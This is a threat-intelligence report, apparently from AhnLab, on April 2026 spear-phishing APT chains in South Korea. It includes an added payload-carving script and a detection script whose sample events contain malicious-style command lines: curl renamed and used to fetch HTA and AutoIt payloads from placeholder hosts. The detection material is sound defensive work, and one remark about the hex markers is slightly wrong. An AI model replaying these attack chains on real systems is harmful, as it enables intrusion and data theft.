April 2026 Threat Trend Report on APT Attacks (South Korea)
Overview
AhnLab used its own monitoring infrastructure to track Advanced Persistent Threat (APT) attacks against targets in South Korea. This report summarizes the classification, statistics, and characteristics of each type of APT attack identified in Korea during April 2026.
Trends of APT Attacks in South Korea
Most of the APT attacks identified in Korea were delivered through spear phishing (phishing aimed at specific individuals or organizations). Threat actors used spoofed sender addresses, malicious files and attachments, and malicious links to trick users into executing the payload themselves.
Type A
This type embeds a malicious PowerShell command in an LNK file; the command connects to an external URL to download additional files. It is characterized by copying curl.exe under a different file name and running the copy, and by downloading both the legitimate AutoIt interpreter and a malicious AutoIt script and registering them in Task Scheduler for persistence. The malicious AutoIt script supported command execution, directory listing, file upload, and file download.
Type B
A PowerShell script embedded in the LNK locates specific markers (NCFO, BCFO, etc.), extracts the hex-encoded data that follows them, and restores three files from it: a legitimate decoy document, the legitimate AutoIt interpreter, and a malicious AutoIt script. The decoy document is opened to distract the user while the malicious script runs from C:\ProgramData, and a scheduled task disguised as a OneDrive update is registered. The infected host then received and executed the threat actor's commands through a PubNub channel whose name was derived from the computer name and user name, and returned the results Base64-encoded.
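The marker-based carving described above can be reproduced on the analyst side to pull the embedded files out of a sample without running the LNK. The script below is an added example (not AhnLab's code and not the actor's PowerShell): it assumes, as a hypothetical layout, that each marker is immediately followed by a run of hex characters encoding one file and that the next marker bounds that run. NCFO and BCFO are named in the report; the third marker XCFO, the constant names, and the sample blob are constructed for illustration.

```python
"""Carve marker-delimited hex payloads out of an LNK-style file (Type B).

Added example, not AhnLab's code. The samples' exact layout (marker order,
lengths, any third marker) is not described in the report, so the layout
used here, the marker XCFO and the sample blob are assumptions.
"""
import re

MARKERS = ("NCFO", "BCFO", "XCFO")   # NCFO/BCFO from the report; XCFO is hypothetical

# Constructed stand-ins for the three restored files.
DECOY = b"%PDF-1.4\n% decoy document\n"            # the legitimate decoy document
AUTOIT_STUB = b"MZ\x90\x00" + b"\x00" * 28           # stand-in for the AutoIt3.exe PE
SCRIPT = b'Run(@ComSpec & " /c whoami")\n'          # stand-in for the malicious .au3


def carve_hex_payloads(blob: bytes, markers=MARKERS) -> dict:
    """Return {marker: decoded bytes} for every marker present in blob.

    The hex run for a marker is bounded by the *next* marker's offset rather
    than by the first non-hex byte: a marker such as BCFO begins with hex
    digits (B, C, F), so a greedy [0-9A-Fa-f]+ scan would swallow part of it.
    """
    found = []
    for marker in markers:
        pos = blob.find(marker.encode())
        if pos >= 0:
            found.append((pos, marker))
    found.sort()                      # process markers in file order

    payloads = {}
    for i, (pos, marker) in enumerate(found):
        start = pos + len(marker)
        end = found[i + 1][0] if i + 1 < len(found) else len(blob)
        run = re.match(rb"[0-9A-Fa-f]+", blob[start:end])
        if not run:
            continue
        hexrun = run.group(0)
        if len(hexrun) % 2:           # odd length: drop the dangling nibble
            hexrun = hexrun[:-1]
        payloads[marker] = bytes.fromhex(hexrun.decode("ascii"))
    return payloads


def sniff(data: bytes) -> str:
    """Crude file-type guess from magic bytes, enough to label carved files."""
    if data.startswith(b"MZ"):
        return "pe"                   # e.g. the legitimate AutoIt interpreter
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith(b"PK\x03\x04"):
        return "zip/ooxml"            # e.g. a .docx decoy
    if data.startswith(b"\xd0\xcf\x11\xe0"):
        return "ole"                  # legacy .doc / OLE container
    try:
        data.decode("ascii")
        return "text"                 # e.g. a plaintext .au3 script
    except UnicodeDecodeError:
        return "unknown"


def triage(blob: bytes) -> list:
    """Return [(marker, guessed type, size)] for each carved payload."""
    return [(m, sniff(d), len(d)) for m, d in carve_hex_payloads(blob).items()]


def build_sample() -> bytes:
    """Constructed stand-in for an LNK with three hex payloads appended."""
    # ShellLinkHeader starts with HeaderSize 0x4C and the ShellLink CLSID.
    lnk_header = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
    return (lnk_header + b"\x00" * 32
            + b"NCFO" + DECOY.hex().encode()
            + b"BCFO" + AUTOIT_STUB.hex().encode()
            + b"XCFO" + SCRIPT.hex().encode())


if __name__ == "__main__":
    for marker, kind, size in triage(build_sample()):
        print(f"{marker}: {kind}, {size} bytes")
```

When the layout of a real sample differs (for example a length prefix after the marker, or the data stored as Base64 instead of hex), only `carve_hex_payloads` needs adjusting; the bounding-by-next-marker rule is the part worth keeping, because every marker listed in the report starts with characters that are also valid hex digits.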
Type C
This type uses curl.exe, which ships with Windows, to download a malicious HTA (HTML Application) file into the %TEMP% folder and execute it. The HTA files were hosted on GitHub repositories or Google Drive operated by the threat actor, and they dropped a decoy file together with a downloader named sys.dll. The downloader loaded an infostealer, a keylogger, and backdoor malware into memory, which leaked system information, lists of key files, virtual asset (cryptocurrency)-related information, and more.
Type D
The PowerShell code embedded in the LNK created and ran a script that generated Base64-encoded data in the %TEMP% path. It then connected to a GitHub repository, downloaded and executed a decoy file and additional malicious scripts, and created a scheduled task disguised as a browser update. The result was exfiltration of system information and deployment of XenoRAT-type remote access malware.
Type E
XML, VBS, and PowerShell scripts embedded in the LNK generate data and register a scheduled task for persistence. The PowerShell script launched through the VBS sent information about the infected system to the attacker and then downloaded and executed an additional BAT file. The BAT file ran a malicious Python script contained in a compressed archive, which ultimately executed a backdoor that allowed remote command execution and file control.
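Several behaviours recur across Types A through E and can be turned into host-level detections: curl.exe run under a different name (Type A), an HTA written to and run from %TEMP% (Type C), PowerShell spawned directly by explorer.exe with hidden/download switches as happens when an LNK is double-clicked (Types A, B, D, E), a scheduled task named like a OneDrive or browser update whose action lives in C:\ProgramData or a Temp folder (Types B, D, E), and a non-browser process talking to PubNub (Type B). The script below is an added example, not AhnLab's code or detection logic: it runs those checks over constructed, Sysmon-shaped event dictionaries (Event ID 1 process creation, Event ID 3 network connection) and a Security 4698 task-registration event. The field names follow Sysmon and the Windows task XML schema, but every value, path, host name and task name is invented for illustration.

```python
"""Detection checks for the LNK -> PowerShell -> curl/AutoIt/HTA chains
described in Types A through E. Added example, not AhnLab's code; the
events below are constructed and the paths/hosts in them are fictitious.
"""
import ntpath
import xml.etree.ElementTree as ET

# Drop locations the report names (C:\ProgramData, %TEMP%) plus a common extra.
SUSPICIOUS_DIRS = ("c:\\programdata\\", "\\appdata\\local\\temp\\", "c:\\users\\public\\")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "autoit3.exe")
PUBNUB_SUFFIXES = ("pubnub.com", "pndsn.com")   # PubNub publish/subscribe origins
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")
PS_FLAGS = ("-w hidden", "-windowstyle hidden", "-enc", "downloadstring",
            "invoke-webrequest", "curl")


def base(path):
    """Lower-cased file name of a Windows path (works on any OS via ntpath)."""
    return ntpath.basename(path or "").lower()


def task_actions(task_xml):
    """Yield (command, arguments) for each <Exec> action in a 4698 TaskContent blob."""
    for node in ET.fromstring(task_xml).iter():
        if node.tag.split("}")[-1] != "Exec":
            continue
        cmd = args = ""
        for child in node:
            tag = child.tag.split("}")[-1]
            if tag == "Command":
                cmd = child.text or ""
            elif tag == "Arguments":
                args = child.text or ""
        yield cmd, args


def check_event(ev):
    """Return the list of rule names the event triggers (empty if benign)."""
    hits = []
    eid = ev.get("EventID")
    if eid == 1:
        img = base(ev.get("Image"))
        orig = (ev.get("OriginalFileName") or "").lower()   # from the PE version info
        cl = (ev.get("CommandLine") or "").lower()
        parent = base(ev.get("ParentImage"))
        # Type A: curl.exe copied under another name; the version resource still says curl.exe
        if orig == "curl.exe" and img != "curl.exe":
            hits.append("renamed_curl")
        # Type C: curl fetching an .hta into Temp, or mshta running one from there
        if (orig == "curl.exe" or img == "mshta.exe") and ".hta" in cl and "\\temp\\" in cl:
            hits.append("hta_in_temp")
        # Types A/B/D/E: explorer.exe -> powershell.exe is what an LNK double-click looks like
        if img == "powershell.exe" and parent == "explorer.exe" and any(f in cl for f in PS_FLAGS):
            hits.append("lnk_powershell")
    elif eid == 3:
        host = (ev.get("DestinationHostname") or "").lower()
        # Type B: PubNub is a legitimate service, so only flag non-browser clients
        if host.endswith(PUBNUB_SUFFIXES) and base(ev.get("Image")) not in BROWSERS:
            hits.append("pubnub_c2")
    elif eid == 4698:
        name = (ev.get("TaskName") or "").lower()
        looks_like_update = any(k in name for k in ("onedrive", "update", "chrome", "edge"))
        for cmd, args in task_actions(ev["TaskContent"]):
            target = (cmd + " " + args).lower()
            # Types B/D/E: update-themed task whose action is a script host or lives in a drop dir
            if looks_like_update and (any(d in target for d in SUSPICIOUS_DIRS) or base(cmd) in SCRIPT_HOSTS):
                hits.append("fake_update_task")
    return hits


def run_detections(events):
    """Return [(event index, rule name)] over a list of events."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]


TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
# Constructed events: five malicious (one per behaviour) and three benign look-alikes.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -windowstyle hidden -c "copy C:\Windows\System32\curl.exe C:\ProgramData\svc.exe"'},
    {"EventID": 1, "Image": r"C:\ProgramData\svc.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"svc.exe -s -o C:\ProgramData\svc.au3 https://cdn.example.invalid/s.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -o C:\Users\victim\AppData\Local\Temp\doc.hta https://drive.example.invalid/doc.hta"},
    {"EventID": 3, "Image": r"C:\ProgramData\AutoIt3.exe", "DestinationHostname": "ps.pndsn.com"},
    {"EventID": 4698, "TaskName": "OneDrive Update",
     "TaskContent": f'<Task xmlns="{TASK_NS}"><Actions><Exec><Command>C:\\ProgramData\\AutoIt3.exe</Command>'
                    '<Arguments>C:\\ProgramData\\svc.au3</Arguments></Exec></Actions></Task>'},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -L -o C:\Users\victim\Downloads\tool.zip https://example.invalid/tool.zip"},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "pubsub.pubnub.com"},
    {"EventID": 4698, "TaskName": "OneDrive Standalone Update Task-S-1-5-21-1000",
     "TaskContent": f'<Task xmlns="{TASK_NS}"><Actions><Exec>'
                    '<Command>%localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe</Command>'
                    '</Exec></Actions></Task>'},
]

if __name__ == "__main__":
    for idx, rule in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The renamed-curl check depends on the `OriginalFileName` field, which Sysmon reads from the binary's version resource; an actor who also strips that resource will evade it, so the process-tree and drop-directory checks are there to catch the same chain from a different angle. The benign OneDrive updater task and the browser connection to PubNub are included precisely because name-only matching on "OneDrive" or "pubnub" would otherwise flood the queue with false positives.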
Type Unknown
We have also seen cases that were distributed via spear phishing but do not fit any of the types described above.
AhnLab Response Overview
AhnLab's products detect the related malware under various names, including Backdoor/Win.Agent.C5882829, Infostealer/Win.Agent.C5882827, Trojan/LNK.Agent, Trojan/PS.Agent, Trojan/HTA.Agent, Trojan/VBS.Agent, Trojan/XML.Task, etc. Note, however, that some of the malware involved in recently observed activity may have been diagnosed under these names before this period, and there may be undiagnosed variants that have not yet been identified.
Conclusion
The APT attacks in Korea this month started with spear phishing emails disguised as work-related content and used a variety of components, including LNK files, PowerShell, curl.exe, AutoIt, HTA, VBS, BAT, and Python. A successful attack can result in backdoor installation, infostealer activity, leakage of system information, and the attacker taking control of the infected system. Users are advised not to open files from unknown sources, to verify the sender carefully, and to keep the OS, web browsers, and other programs fully patched and V3 updated to the latest version.